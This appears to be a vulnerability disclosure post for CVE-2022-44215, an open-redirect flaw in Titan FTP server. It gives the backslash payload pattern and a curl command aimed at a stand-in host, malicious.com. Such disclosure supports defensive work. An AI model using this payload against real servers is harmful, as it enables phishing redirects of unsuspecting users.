**Introduction**

A new vulnerability has been discovered affecting Titan FTP web server catalogued as CVE-2022-44215. Titan FTP is a commertial software created by South River Technologies that implements FTP protocol for file sharing. In its HTTP(S) version 19.X and prior, it has been proved to be vulnerable to an Open Redirection vulnerability.

**Description**

An Open redirection vulnerability consist into the server not correctly sanitizing the user’s input. Therefore, a redirection is done using the user-supplied input without sanitization (white/blacklisting). In this case, Titan FTP server performs a redirection when a backslash \ is encountered in the URL. No matter if the backslash is in plaintext or URL encoded (%5C). https://<server>\<malicious_url> will produce the server supplying a redirection to \<malicious_url>.

**Testing**

To exploit this, the browser needs to understand the protocol of the location HTTP response header. This is to contain HTTP or HTTPS. To circumvent this, it is possible to supply instead of one backslash, two of them “\\”. This will be interpreted as a protocol separator and most browsers will use HTTP protocol by default. In the end, the working payload to achieve a redirection will be something similar to this: http[s]://<server>\\<malicious_url>

To perform this test, also CURL can be used. However, bear in mind that CURL will detect it as bad crafted since “\\” is prohibited by the standard RFC 2396. To bypass this using curl we can use the following command:

Curl -i http[s]://<server> --request-target \\\\malicious.com

**Proof of concept**

Despite the issue, the exploitation is limited due to browsers normally rewrite starting backslashes “\\” into “/”, producing that attacks using directly the plaintext will not work in most of the cases. Some workarounds could be done using HTML payloads that bypass browsers URL rewrite rules.

**Conclusion**

According to Shodan, in December 2022 this server is publicly exposed at 1.278 servers worldwide:

This vulnerability could be used by attackers to perform social engineering attacks redirecting victims to fake FTP login pages or other phishing scenarios.

Tag

#ios